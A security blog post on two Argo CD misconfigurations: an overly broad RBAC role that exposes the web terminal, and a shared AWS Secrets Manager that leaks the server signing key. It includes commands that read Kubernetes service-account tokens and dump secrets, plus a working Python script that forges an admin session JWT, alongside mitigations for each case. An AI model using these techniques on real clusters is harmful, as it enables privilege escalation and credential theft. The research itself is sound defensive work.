Argo CD Security Misconfiguration Adventures

Blog posts

Managing applications deployed in Kubernetes clusters can be very complex. Several projects and tools were created to tackle these challenges. Nowadays it is common to hear companies use “CI/CD pipelines” (Continuous Integration and Continuous Delivery) to ease deploying and managing some applications in production environments. This leverages some components which bridge the source code hosting platform (such as GitHub or GitLab) with the places where applications run, like Kubernetes clusters. Many new terms emerged over time: “Infrastructure as Code”, “DevOps”, “GitOps”, etc.

This article will not go into details about what all these terms mean and why they have been so trendy for some years. Instead, it will focus on a specific project commonly used in such contexts: Argo CD.

Argo CD demonstration website, https://cd.apps.argoproj.io/

From developers’ perspective, Argo CD provides a lightweight way to deploy applications and to monitor their health: most of its configuration happens in files in git repositories or in Kubernetes resources ; the web interface provides a summary of the state of the application, as well as a sneak peak at the generated logs and events ; the command-line tool enables to easily automate some tasks.

Argo CD’s architecture is also quite common and the components are constructed in a way which sounds intuitive when using source code hosting platforms and Kubernetes clusters. This helps build confidence and trust that Argo CD “just works”.

Argo CD Architecture diagram (source)

What about its security? It seems to be taken very seriously:

Moreover, its demo website https://cd.apps.argoproj.io/ provides anonymous read-only access. This emphases granting read-only access to an Argo CD instance should not enable attackers to read sensitive data or modify the deployed applications. For example, the hash of the admin password is stored in a Kubernetes Secret named argocd-secret. The demo website displays this Secret in https://cd.apps.argoproj.io/applications/argocd/argo-cd?view=tree&resource=&node=%2FSecret%2Fargocd%2Fargocd-secret%2F0:

data:
  admin.password: ++++++++
  admin.passwordMtime: ++++++++
  server.secretkey: ++++++++
  tls.crt: ++++++++
  tls.key: ++++++++
kind: Secret

The sensitive values were redacted in the web interface and there is no way to edit the Secret. If there was, this would be considered as a vulnerability in Argo CD (and should be reported to Argo CD’s security team).

By the way, configuring Argo CD to provide such an anonymous read-only access could provide insight into infrastructure components which helps attackers design ways to perform malicious actions. This is why it is usually recommended to restrict the access to the website to private networks (not exposing it to the Internet), like Trend Micro wrote in May 2022.

Despite such a strong security posture, Argo CD can be configured in ways creating vulnerabilities. This article studies on two examples where Argo CD is deployed in a way which unexpectedly enabled privilege escalation and authentication bypass.

Case Study 1. Web-Based Terminal For Everyone

Argo CD web-based terminal (source)

Case Study 1 – Scenario

Even though Argo CD provides great insight about the Kubernetes resources deployed for an application, sometimes nothing beats an interactive shell directly running in the context of application. Kubernetes provides such a feature with kubectl exec.

In Argo CD, the web-based terminal bridges kubectl exec with the web interface. To enable it, Argo CD’s configuration needs to be modified in a way thoroughly presented in the documentation. Moreover users need to be granted a special right to use it. This can be done by adding a line to the RBAC policy:

p, role:myrole, exec, create, */*, allow

In non-production environments, it can make sense to grant such a privilege to all users, without actually making them administrators of Argo CD or of the managed Kubernetes cluster. A possible way to easily perform this would be to:

  • copy the built-in policy of role readonly into a new role, named ro-exec ;
  • add the rule allowing to use the web-based terminal to this role ;
  • attribute role ro-exec by default to all users ;

This configuration happens in Kubernetes ConfigMap, argocd-rbac-cm and may look like this:

apiVersion: v1
kind: ConfigMap
metadata:
  name: argocd-rbac-cm
  namespace: argocd
data:
  policy.csv: |
    p, role:ro-exec, applications, get, */*, allow
    p, role:ro-exec, certificates, get, *, allow
    p, role:ro-exec, clusters, get, *, allow
    p, role:ro-exec, repositories, get, *, allow
    p, role:ro-exec, projects, get, *, allow
    p, role:ro-exec, accounts, get, *, allow
    p, role:ro-exec, gpgkeys, get, *, allow
    p, role:ro-exec, logs, get, */*, allow
    p, role:ro-exec, exec, create, */*, allow
  policy.default: role:ro-exec

Let’s assume we have access to such an Argo CD instance. From an attacker’s perspective, the web-based terminal is very similar to gaining remote code execution in all pods managed by Argo CD. This is known to be very dangerous. But in practice, is it possible to abuse the web-based terminal to gain more privileges on the cluster?

Case Study 1 – Attack

When attackers manage to get a shell inside a Kubernetes pod, several attacks can be performed:

  • They can read environment variables, which could contain sensitive values (not supposed to be exposed).
  • They can steal the token used to authenticate to Kubernetes API (usually located in /var/run/secrets/kubernetes.io/serviceaccount/token) and use it to impersonate the pod. Sometimes, an application is using containers with high privileges and this token is enough to compromise the whole Kubernetes cluster.
  • They can abuse misconfiguration of the Kubernetes cluster, like accessible AWS instance metadata service (IMDS), to impersonate the role granted to the Kubernetes worker node.

These techniques have already been described in many places, including in Datadog’s Cloud Security Atlas (for example in page EKS cluster allows pods to steal worker nodes’ AWS credentials).

In the studied use-case, let’s suppose the Kubernetes cluster was properly secured, Argo CD is managing its own deployment (so its Kubernetes resources are available in the web interface, like in the demo) and only few settings were modified (such as the ones granting access to the web-based terminal).

In this use-case, Argo CD deployed a StatefulSet named argocd-application-controller (and defined on GitHub in argo-cd:manifests/base/application-controller/argocd-application-controller-statefulset.yaml). This StatefulSet manages a pod, named by default argocd-application-controller-0, with the service account argocd-application-controller. This account is bound to ClusterRole application-controller defined as:

apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  labels:
    app.kubernetes.io/name: argocd-application-controller
    app.kubernetes.io/part-of: argocd
    app.kubernetes.io/component: application-controller
  name: argocd-application-controller
rules:
- apiGroups:
  - '*'
  resources:
  - '*'
  verbs:
  - '*'
- nonResourceURLs:
  - '*'
  verbs:
  - '*'

So many stars mean this ClusterRole is allowed to administer the cluster. We say it is “cluster admin”.

In short, an attacker can get cluster admin privileges by:

  1. Searching for pod argocd-application-controller-0 in Argo CD’s web view of Argo CD application;
  2. Launching a web-based terminal;
  3. Running cat /var/run/secrets/kubernetes.io/serviceaccount/token in the terminal;
  4. Reading the output to retrieve a valid Kubernetes token for service account application-controller;
  5. Configuring kubectl to use this token (with other settings such as the Kubernetes API endpoint and the certificate authority to use).

After this, kubectl confirms it is possible to perform any action on all resources of the cluster:

$ kubectl auth can-i --list
Resources       Non-Resource URLs       Resource Names     Verbs
*.*             []                      []                 [*]
                [*]                     []                 [*]
...

Case Study 1 – Mitigations

Allowing unprivileged users to run a web-based terminal on application Argo CD leads to a possible privilege escalation. What can be done to prevent this?

First, it is possible to configure Argo CD RBAC policy in a more fine-grained way. For example, it is possible to only authorize users to spawn a terminal in their own projects (not the ones with Argo CD or with cluster-admin pods). This can be achieved with a fine-grained RBAC policy such as:

p, role:unprivileged-role, exec, create, some-project/*, allow

Second, it is possible to make argocd-application-controller not actually run with cluster admin privileges. Actually, the fact it was cluster admin was reported in February 2021, in argoproj/argo-cd issue #5389: define minimum necessary RBAC permissions. At the time of writing (December 2024), this issue is still open. Nevertheless, Argo CD’s Helm charts were modified in 2021 to enable overriding the definition of ClusterRole argocd-application-controller (cf. argoproj/argo-helm issue #721: feat: Support custom rules for the application controller cluster role and argoproj/argo-helm pull request #730: feat: Support custom rules for the Application Controller Cluster Role). Therefore, Kubernetes administrators can use this to define a fine-grained Kubernetes role for argocd-application-controller. This limits the impact attackers could have when they manage to run commands in pod argocd-application-controller-0 and helps applying defense in depth.

Finally, monitoring the Kubernetes cluster for unauthorized shell sessions spawned in containers helps detecting similar attacks.

Case Study 2. Mishandling the Server Secret Key

Case Study 2 – Scenario

Argo CD stores all its settings in Kubernetes resources such as Kubernetes ConfigMaps and Secrets. The Secrets can be synchronized with other secret management systems like AWS Secrets Manager, HashiCorp Vault, etc. A possible way to do this consists in deploying External Secrets Operator (ESO) in a cluster. Such a configuration appears to be quite common, according to presentations given at public conferences. For example, in a talk given at KubeCon + CloudNativeCon Europe 2024 titled “Keeping the Bricks Flowing: The LEGO Group’s Approach to Platform Engineering for Manufacturing”, the presenters showed how they were using Argo CD and external secrets in their infrastructure (YouTube recording from 9:21).

The security policy around the secret management system is sometimes not fine-grained enough. For the studied use-case, let’s imagine an AWS account having several EKS clusters for different purposes: “Cluster A”, “Cluster B”, etc. The administrator followed the documentation to configure their AWS account. Each ESO service account on Kubernetes are associated with an AWS IAM role which has the permission to read all secrets (action secretsmanager:GetSecretValue on resource arn:aws:secretsmanager:eu-west-3:111122223333:secret:*).

To make things more precise, this example considers that Argo CD is installed in Cluster A, its Kubernetes Secret argocd-secret is synchronized with AWS Secrets Manager, and an attacker managed to compromise Cluster B. This means that the attacker can impersonate the External Secrets Operator deployed in Cluster B to read all secrets stored in the shared AWS Secrets Manager.

In such a scenario, can the attacker move to Cluster A?

Case Study 2 – Attack

The attacker can configure their AWS command-line to use the authentication token from Cluster B’s ESO, for example by configuring relevant environment variables such as AWS_ROLE_ARN and AWS_WEB_IDENTITY_TOKEN_FILE and AWS_ROLE_SESSION_NAME (as documented by AWS). They can then read the AWS secret associated with argocd-secret with a command such as aws secretsmanager get-secret-value --secret-id platform/argocd/secret (the name of the AWS secret could be guessed or obtained through other means):

{
  "ARN": "arn:aws:secretsmanager:eu-west-1:111122223333:secret:platform/argocd/
secret-ekRl8v",
  "Name": "platform/argocd/secret",
  "VersionId": "43bbc457-3c1b-47b2-8c04-ea2dfa184ef9",
  "SecretString": "{
\"admin.password\":
\"$2a$10$4sRnwtvm9XMbSAPDZyImTeh37MREP6yDnRfellIQamT/cuMn5Jgm.\",
\"server.secretkey\":\"JA+Lqmv/d7TbM8yrOEIT+cRIsJAGxAxrqo6hghOK9MQ=\"}",
  "VersionStages": [
    "AWSCURRENT"
  ],
  "CreatedDate": "2024-11-22T12:13:37+00:00"
}

The SecretString contains the password hash of the admin user, in the field admin.password! The attacker could try guessing the password or cracking it through brute-force, even though this attack would likely fail if it was randomly generated (in this example, it was and its value was AFZTfDcfHySb2Skv).

Moreover, if the AWS IAM policy used by Cluster B’s ESO included secretsmanager:PutSecretValue (which is required for ESO feature PushSecret), the attacker would be able to modify the password hash. This would enable them to impersonate the admin user.

In the general case, knowing the hash in admin.password does not help the attacker much. But the Kubernetes Secret contains another field, server.secretkey. What is it used for?

In Argo CD’s source code, server.secretkey is called the “server signature key”. It gets loaded in argo-cd:util/settings/settings.go:

const (
    // settingServerSignatureKey designates the key for a server secret key
    // inside a Kubernetes secret.
    settingServerSignatureKey = "server.secretkey"
)

// updateSettingsFromSecret transfers settings from a Kubernetes secret
// into an ArgoCDSettings struct.
func (mgr *SettingsManager) updateSettingsFromSecret(settings *ArgoCDSettings,
  argoCDSecret *apiv1.Secret, secrets []*apiv1.Secret) error {
    // ...
    secretKey, ok := argoCDSecret.Data[settingServerSignatureKey]
    if ok {
        settings.ServerSignature = secretKey

This signature key is used in argo-cd:util/session/sessionmanager.go to sign and verify a session token with HMAC-SHA256:

func (mgr *SessionManager) signClaims(claims jwt.Claims) (string, error) {
    token := jwt.NewWithClaims(jwt.SigningMethodHS256, claims)
    // ...
    return token.SignedString(settings.ServerSignature)
}

func (mgr *SessionManager) Parse(tokenString string) (jwt.Claims, string, error) {
    // ...
    token, err := jwt.ParseWithClaims(tokenString, &claims,
        func(token *jwt.Token) (interface{}, error) {
            // ...
            return argoCDSettings.ServerSignature, nil
    })

Knowing the key should be enough to forge a token to impersonate the user admin. There are some caveats to take care of (function GetSubjectAccountAndCapability requires the subject claim to actually be admin:login ; function Parse requires the token to have a non-empty ID in claim jti ; the issuer has to be “argocd”). Here is some Python code which forges a token valid for 24 hours, solving the difficulties:

import base64
import json
import hmac
import time

def b64url_encode(data: bytes) -> bytes:
    return base64.urlsafe_b64encode(data).rstrip(b"=")

def forge_jwt(key: str, audience: str = "argocd") -> str:
    now = int(time.time())
    header = json.dumps({
        "alg": "HS256",
        "typ": "JWT",
    }).encode("ascii")
    claims = json.dumps({
        "iss": "argocd",
        "aud": audience,
        "iat": now,
        "nbf": now,
        "exp": now + 24 * 3600,
        "sub": "admin:login",
        "jti": "01234567-89ab-cdef-0123-456789abcdef",
    }).encode("ascii")
    signed = b64url_encode(header) + b"." + b64url_encode(claims)
    signature = hmac.digest(key.encode("ascii"), signed, "sha256")
    token = signed + b"." + b64url_encode(signature)
    return token.decode("ascii")

print(forge_jwt("JA+Lqmv/d7TbM8yrOEIT+cRIsJAGxAxrqo6hghOK9MQ="))

In a web browser, defining cookie argocd.token with the produced token is enough to bypass the login screen and successfully authenticate as admin.
Even though the obtained administrator privileges enable many actions in Argo CD, it does not enable reading Kubernetes Secrets or impersonating service accounts. It is nevertheless possible to deploy new Argo CD applications (if the underlying Kubernetes cluster enables it, which is usually true). The attacker can then deploy their own Helm chart with a cluster-admin service account and a Kubernetes Job running commands such as:

# Read all Kubernetes Secrets from the cluster
kubectl get secrets -A

# Generate a Kubernetes token valid for 136 years
kubectl create token --duration=4294967296s -n argocd \
    argocd-application-controller

Case Study 2 – Mitigations

First, the Kubernetes Secret argocd-secret is very sensitive, as knowing it enables impersonating any local user defined in Argo CD, including admin. If it is synchronized with ESO, access to the Secrets Manager should be properly defined to prevent unauthorized access.

Second, as documented in Argo CD’s documentation, the initial admin password should be modified, and the new one should be robust enough so that gaining access to the password hash should not enable an attacker to guess it. Moreover, when administrators are authenticated through some SSO (Single Sign On), disabling the local admin account improves the security as it prevents the described attack (usually, session tokens of SSO users are not signed by server.secretkey)

Third, it reduces the impact of the attack to run Argo CD without cluster admin privileges and to apply some common practices to harden the Kubernetes cluster (such as configuring it to reject creating privileged pods in some namespaces).

Finally, if a security incident response analysis finds out the attacker managed to read argocd-secret, it makes sense to consider the attacker gained cluster admin privileges and to act accordingly.

Conclusion

This article studied two kinds of misconfiguration in Argo CD and the attacks they allowed. It described their impact and the possible mitigations which could be performed to prevent them or reduce the impact.

Even though Argo CD employs state-of-the-art security practices, this illustrates that vulnerabilities can also occur from the way it is deployed and the platform is configured.

We hope this article helps to better understand what impact some deployment and configuration choices may have.


Nicolas IOOSS (Twitter / Linkedin)
Software Security Engineer at Ledger Donjon

You might also like